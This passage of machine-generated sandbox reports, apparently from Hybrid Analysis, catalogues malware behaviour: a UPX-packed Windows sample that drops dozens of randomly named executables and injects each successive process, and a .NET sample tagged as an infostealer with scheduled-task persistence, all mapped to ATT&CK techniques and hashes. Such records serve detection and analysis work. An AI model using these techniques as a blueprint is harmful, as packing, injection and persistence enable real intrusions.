"threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"fvxfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fpnhxpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dlnbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfjjpnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bttxlfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hlphd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8664860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"868480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"44822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxvrdvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dlvbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pfftl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfrvlvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfrvlvv.exe]- [targetUID: 00000000-00001292]\n \"tfjtht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfjtht.exe]- [targetUID: 00000000-00001292]\n \"02488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02488.exe]- [targetUID: 00000000-00002876]\n \"24026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24026.exe]- [targetUID: 00000000-00004040]\n \"020286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\020286.exe]- [targetUID: 00000000-00004040]\n \"fnttpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnttpf.exe]- [targetUID: 00000000-00003776]\n \"lpftbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpftbf.exe]- [targetUID: 00000000-00002812]\n \"bhbtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bhbtd.exe]- [targetUID: 00000000-00003972]\n \"vtbthnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtbthnv.exe]- [targetUID: 00000000-00003972]\n \"hbrjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbrjl.exe]- [targetUID: 00000000-00003064]\n \"bnvxpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnvxpv.exe]- [targetUID: 00000000-00003844]\n \"rnhbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rnhbh.exe]- [targetUID: 00000000-00003844]\n \"ntnbrnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntnbrnr.exe]- [targetUID: 00000000-00002172]\n \"6466820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6466820.exe]- [targetUID: 00000000-00000704]\n \"4088420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4088420.exe]- [targetUID: 00000000-00002764]\n \"408628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408628.exe]- [targetUID: 00000000-00002764]\n \"284486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\284486.exe]- [targetUID: 00000000-00003416]\n \"8280068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8280068.exe]- [targetUID: 00000000-00003416]\n \"0824600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0824600.exe]- [targetUID: 00000000-00003028]\n \"fdjlrbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdjlrbp.exe]- [targetUID: 00000000-00004568]\n \"hrhfdtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrhfdtt.exe]- [targetUID: 00000000-00003748]\n \"xrfpvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfpvx.exe]- [targetUID: 00000000-00001844]\n \"4640626.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640626.exe]- [targetUID: 00000000-00000708]\n \"8024466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8024466.exe]- [targetUID: 00000000-00001604]\n \"0806624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0806624.exe]- [targetUID: 00000000-00001604]\n \"042464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\042464.exe]- [targetUID: 00000000-00000888]\n \"604420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\604420.exe]- [targetUID: 00000000-00001656]\n \"4288806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4288806.exe]- [targetUID: 00000000-00001656]\n \"24226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24226.exe]- [targetUID: 00000000-00003624]\n \"00644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00644.exe]- [targetUID: 00000000-00003996]\n \"408822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408822.exe]- [targetUID: 00000000-00003448]\n \"vldfrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vldfrx.exe]- [targetUID: 00000000-00003448]\n \"jbvvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbvvj.exe]- [targetUID: 00000000-00000608]\n \"xxlthnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxlthnt.exe]- [targetUID: 00000000-00000608]\n \"bdvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdvpj.exe]- [targetUID: 00000000-00002152]\n \"thntdfd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thntdfd.exe]- [targetUID: 00000000-00002152]\n \"648268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648268.exe]- [targetUID: 00000000-00000656]\n \"0080208.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0080208.exe]- [targetUID: 00000000-00005392]\n \"62266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62266.exe]- [targetUID: 00000000-00005392]\n \"484088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\484088.exe]- [targetUID: 00000000-00001856]\n \"0064284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0064284.exe]- [targetUID: 00000000-00001856]\n \"fbtltj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fbtltj.exe]- [targetUID: 00000000-00003500]\n \"rxvhlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxvhlp.exe]- [targetUID: 00000000-00001852]\n \"ftvfbtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftvfbtx.exe]- [targetUID: 00000000-00001852]\n \"xvnnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvnnn.exe]- [targetUID: 00000000-00002444]\n \"dxrftlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dxrftlp.exe]- [targetUID: 00000000-00003260]\n \"dppbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dppbn.exe]- [targetUID: 00000000-00003260]\n \"hnbnnnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnbnnnb.exe]- [targetUID: 00000000-00003680]\n \"nvrtbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvrtbh.exe]- [targetUID: 00000000-00003228]\n \"880202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880202.exe]- [targetUID: 00000000-00003228]\n \"882066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\882066.exe]- [targetUID: 00000000-00005072]\n \"626400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626400.exe]- [targetUID: 00000000-00005072]\n \"bnjjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnjjv.exe]- [targetUID: 00000000-00006092]\n \"pxjrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxjrr.exe]- [targetUID: 00000000-00006120]\n \"8844064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8844064.exe]- [targetUID: 00000000-00006120]\n \"jrfxlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrfxlf.exe]- [targetUID: 00000000-00004648]\n \"plfthj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\plfthj.exe]- [targetUID: 00000000-00002116]\n \"xvdbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvdbp.exe]- [targetUID: 00000000-00002116]\n \"njljtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njljtn.exe]- [targetUID: 00000000-00002220]\n \"xrnbdjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrnbdjd.exe]- [targetUID: 00000000-00005188]\n \"06224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06224.exe]- [targetUID: 00000000-00004268]\n \"26802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26802.exe]- [targetUID: 00000000-00004268]\n \"06484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06484.exe]- [targetUID: 00000000-00005352]\n \"242680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242680.exe]- [targetUID: 00000000-00005352]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has section name UPX1 with entropy \"7.97244478673\"\n \"fvxfr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fpnhxpp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dlnbh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jfjjpnn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bttxlfh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hlphd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8664860.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"868480.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"44822.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"06066.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lxvrdvn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dlvbt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pfftl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hfrvlvv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tfjtht.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"02488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"24026.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"020286.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fnttpf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lpftbf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bhbtd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vtbthnv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hbrjl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bnvxpv.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has a section named \"UPX0\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has a section named \"UPX1\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has a section named \"UPX2\"\n \"fvxfr.exe\" has a section named \"UPX0\"\n \"fvxfr.exe\" has a section named \"UPX1\"\n \"fvxfr.exe\" has a section named \"UPX2\"\n \"fpnhxpp.exe\" has a section named \"UPX0\"\n \"fpnhxpp.exe\" has a section named \"UPX1\"\n \"fpnhxpp.exe\" has a section named \"UPX2\"\n \"dlnbh.exe\" has a section named \"UPX0\"\n \"dlnbh.exe\" has a section named \"UPX1\"\n \"dlnbh.exe\" has a section named \"UPX2\"\n \"jfjjpnn.exe\" has a section named \"UPX0\"\n \"jfjjpnn.exe\" has a section named \"UPX1\"\n \"jfjjpnn.exe\" has a section named \"UPX2\"\n \"bttxlfh.exe\" has a section named \"UPX0\"\n \"bttxlfh.exe\" has a section named \"UPX1\"\n \"bttxlfh.exe\" has a section named \"UPX2\"\n \"hlphd.exe\" has a section named \"UPX0\"\n \"hlphd.exe\" has a section named \"UPX1\"\n \"hlphd.exe\" has a section named \"UPX2\"\n \"8664860.exe\" has a section named \"UPX0\"\n \"8664860.exe\" has a section named \"UPX1\"\n \"8664860.exe\" has a section named \"UPX2\"\n \"868480.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (UID: 00000000-00005476)\n Spawned process \"242680.exe\" (UID: 00000000-00005352)\n Spawned process \"06484.exe\" (UID: 00000000-00003928)\n Spawned process \"26802.exe\" (UID: 00000000-00004268)\n Spawned process \"06224.exe\" (UID: 00000000-00005168)\n Spawned process \"xrnbdjd.exe\" (UID: 00000000-00005188)\n Spawned process \"njljtn.exe\" (UID: 00000000-00002220)\n Spawned process \"xvdbp.exe\" (UID: 00000000-00002116)\n Spawned process \"plfthj.exe\" (UID: 00000000-00005664)\n Spawned process \"jrfxlf.exe\" (UID: 00000000-00004648)\n Spawned process \"8844064.exe\" (UID: 00000000-00006120)\n Spawned process \"pxjrr.exe\" (UID: 00000000-00006092)\n Spawned process \"bnjjv.exe\" (UID: 00000000-00003796)\n Spawned process \"626400.exe\" (UID: 00000000-00005072)\n Spawned process \"882066.exe\" (UID: 00000000-00003232)\n Spawned process \"880202.exe\" (UID: 00000000-00003228)\n Spawned process \"nvrtbh.exe\" (UID: 00000000-00003680)\n Spawned process \"hnbnnnb.exe\" (UID: 00000000-00000132)\n Spawned process \"dppbn.exe\" (UID: 00000000-00003260)\n Spawned process \"dxrftlp.exe\" (UID: 00000000-00002444)\n Spawned process \"xvnnn.exe\" (UID: 00000000-00003456)\n Spawned process \"ftvfbtx.exe\" (UID: 00000000-00001852)\n Spawned process \"rxvhlp.exe\" (UID: 00000000-00003500)\n Spawned process \"fbtltj.exe\" (UID: 00000000-00000692)\n Spawned process \"0064284.exe\" (UID: 00000000-00001856)\n Spawned process \"484088.exe\" (UID: 00000000-00005740)\n Spawned process \"62266.exe\" (UID: 00000000-00005392)\n Spawned process \"0080208.exe\" (UID: 00000000-00000656)\n Spawned process \"648268.exe\" (UID: 00000000-00002464)\n Spawned process \"thntdfd.exe\" (UID: 00000000-00002152)\n Spawned process \"bdvpj.exe\" (UID: 00000000-00004464)\n Spawned process \"xxlthnt.exe\" (UID: 00000000-00000608)\n Spawned process \"jbvvj.exe\" (UID: 00000000-00006124)\n Spawned process \"vldfrx.exe\" (UID: 00000000-00003448)\n Spawned process \"408822.exe\" (UID: 00000000-00000828)\n Spawned process \"00644.exe\" (UID: 00000000-00003996)\n Spawned process \"24226.exe\" (UID: 00000000-00003624)\n Spawned process \"4288806.exe\" (UID: 00000000-00001656)\n Spawned process \"604420.exe\" (UID: 00000000-00000888)\n Spawned process \"042464.exe\" (UID: 00000000-00003168)\n Spawned process \"0806624.exe\" (UID: 00000000-00001604)\n Spawned process \"8024466.exe\" (UID: 00000000-00000708)\n Spawned process \"4640626.exe\" (UID: 00000000-00001572)\n Spawned process \"xrfpvx.exe\" (UID: 00000000-00001844)\n Spawned process \"hrhfdtt.exe\" (UID: 00000000-00003748)\n Spawned process \"fdjlrbp.exe\" (UID: 00000000-00004568)\n Spawned process \"0824600.exe\" (UID: 00000000-00003028)\n Spawned process \"8280068.exe\" (UID: 00000000-00003416)\n Spawned process \"284486.exe\" (UID: 00000000-00001408)\n Spawned process \"408628.exe\" (UID: 00000000-00002764)\n Spawned process \"4088420.exe\" (UID: 00000000-00005572)\n Spawned process \"6466820.exe\" (UID: 00000000-00000704)\n Spawned process \"ntnbrnr.exe\" (UID: 00000000-00002172)\n Spawned process \"rnhbh.exe\" (UID: 00000000-00003844)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" wrote 32 bytes to a remote process \"C:\\242680.exe\" (Handle: 120)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" wrote 52 bytes to a remote process \"C:\\242680.exe\" (Handle: 120)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" wrote 4 bytes to a remote process \"C:\\242680.exe\" (Handle: 120)\n \"242680.exe\" wrote 32 bytes to a remote process \"C:\\06484.exe\" (Handle: 116)\n \"242680.exe\" wrote 52 bytes to a remote process \"C:\\06484.exe\" (Handle: 116)\n \"242680.exe\" wrote 4 bytes to a remote process \"C:\\06484.exe\" (Handle: 116)\n \"06484.exe\" wrote 32 bytes to a remote process \"C:\\26802.exe\" (Handle: 116)\n \"06484.exe\" wrote 52 bytes to a remote process \"C:\\26802.exe\" (Handle: 116)\n \"06484.exe\" wrote 4 bytes to a remote process \"C:\\26802.exe\" (Handle: 116)\n \"26802.exe\" wrote 32 bytes to a remote process \"C:\\06224.exe\" (Handle: 68)\n \"26802.exe\" wrote 52 bytes to a remote process \"C:\\06224.exe\" (Handle: 68)\n \"26802.exe\" wrote 4 bytes to a remote process \"C:\\06224.exe\" (Handle: 68)\n \"06224.exe\" wrote 32 bytes to a remote process \"C:\\xrnbdjd.exe\" (Handle: 116)\n \"06224.exe\" wrote 52 bytes to a remote process \"C:\\xrnbdjd.exe\" (Handle: 116)\n \"06224.exe\" wrote 4 bytes to a remote process \"C:\\xrnbdjd.exe\" (Handle: 116)\n \"xrnbdjd.exe\" wrote 32 bytes to a remote process \"C:\\njljtn.exe\" (Handle: 116)\n \"xrnbdjd.exe\" wrote 52 bytes to a remote process \"C:\\njljtn.exe\" (Handle: 116)\n \"xrnbdjd.exe\" wrote 4 bytes to a remote process \"C:\\njljtn.exe\" (Handle: 116)\n \"njljtn.exe\" wrote 32 bytes to a remote process \"C:\\xvdbp.exe\" (Handle: 116)\n \"njljtn.exe\" wrote 52 bytes to a remote process \"C:\\xvdbp.exe\" (Handle: 116)\n \"njljtn.exe\" wrote 4 bytes to a remote process \"C:\\xvdbp.exe\" (Handle: 116)\n \"xvdbp.exe\" wrote 32 bytes to a remote process \"C:\\plfthj.exe\" (Handle: 120)\n \"xvdbp.exe\" wrote 52 bytes to a remote process \"C:\\plfthj.exe\" (Handle: 120)\n \"xvdbp.exe\" wrote 4 bytes to a remote process \"C:\\plfthj.exe\" (Handle: 120)\n \"plfthj.exe\" wrote 32 bytes to a remote process \"C:\\jrfxlf.exe\" (Handle: 116)\n \"plfthj.exe\" wrote 52 bytes to a remote process \"C:\\jrfxlf.exe\" (Handle: 116)\n \"plfthj.exe\" wrote 4 bytes to a remote process \"C:\\jrfxlf.exe\" (Handle: 116)\n \"jrfxlf.exe\" wrote 32 bytes to a remote process \"C:\\8844064.exe\" (Handle: 68)\n \"jrfxlf.exe\" wrote 52 bytes to a remote process \"C:\\8844064.exe\" (Handle: 68)\n \"jrfxlf.exe\" wrote 4 bytes to a remote process \"C:\\8844064.exe\" (Handle: 68)\n \"8844064.exe\" wrote 32 bytes to a remote process \"C:\\pxjrr.exe\" (Handle: 120)\n \"8844064.exe\" wrote 52 bytes to a remote process \"C:\\pxjrr.exe\" (Handle: 120)\n \"8844064.exe\" wrote 4 bytes to a remote process \"C:\\pxjrr.exe\" (Handle: 120)\n \"pxjrr.exe\" wrote 32 bytes to a remote process \"C:\\bnjjv.exe\" (Handle: 68)\n \"pxjrr.exe\" wrote 52 bytes to a remote process \"C:\\bnjjv.exe\" (Handle: 68)\n \"pxjrr.exe\" wrote 4 bytes to a remote process \"C:\\bnjjv.exe\" (Handle: 68)\n \"bnjjv.exe\" wrote 32 bytes to a remote process \"C:\\626400.exe\" (Handle: 68)\n \"bnjjv.exe\" wrote 52 bytes to a remote process \"C:\\626400.exe\" (Handle: 68)\n \"bnjjv.exe\" wrote 4 bytes to a remote process \"C:\\626400.exe\" (Handle: 68)\n \"626400.exe\" wrote 32 bytes to a remote process \"C:\\882066.exe\" (Handle: 76)\n \"626400.exe\" wrote 52 bytes to a remote process \"C:\\882066.exe\" (Handle: 76)\n \"626400.exe\" wrote 4 bytes to a remote process \"C:\\882066.exe\" (Handle: 76)\n \"882066.exe\" wrote 32 bytes to a remote process \"C:\\880202.exe\" (Handle: 116)\n \"882066.exe\" wrote 52 bytes to a remote process \"C:\\880202.exe\" (Handle: 116)\n \"882066.exe\" wrote 4 bytes to a remote process \"C:\\880202.exe\" (Handle: 116)\n \"880202.exe\" wrote 32 bytes to a remote process \"C:\\nvrtbh.exe\" (Handle: 68)\n \"880202.exe\" wrote 52 bytes to a remote process \"C:\\nvrtbh.exe\" (Handle: 68)\n \"880202.exe\" wrote 4 bytes to a remote process \"C:\\nvrtbh.exe\" (Handle: 68)\n \"nvrtbh.exe\" wrote 32 bytes to a remote process \"C:\\hnbnnnb.exe\" (Handle: 72)\n \"nvrtbh.exe\" wrote 52 bytes to a remote process \"C:\\hnbnnnb.exe\" (Handle: 72)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07
https://hybrid-analysis.com/sample/e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07
Hybrid Analysis - Infostealers
{"size": 495616, "type": "PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07", "sha256": "e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07", "av_detect": 83, "vx_family": "MSIL.Krypt.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 2, "total_signatures": 184, "extracted_files": [{"name": "577.exe", "file_path": "%TEMP%\\577.exe", "file_size": 179200, "sha256": "2d5e02ba59cb4bcee98989f93bb65d977f61243eb402435eaa7686c0746de951", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe (PID: 1916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00001916", "name": "e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe", "normalized_path": "C:\\e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe", "sha256": "e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07"}, {"uid": "00000000-00005100", "parentuid": "00000000-00001916", "name": "577.exe", "normalized_path": "%TEMP%\\577.exe", "sha256": "2d5e02ba59cb4bcee98989f93bb65d977f61243eb402435eaa7686c0746de951"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": 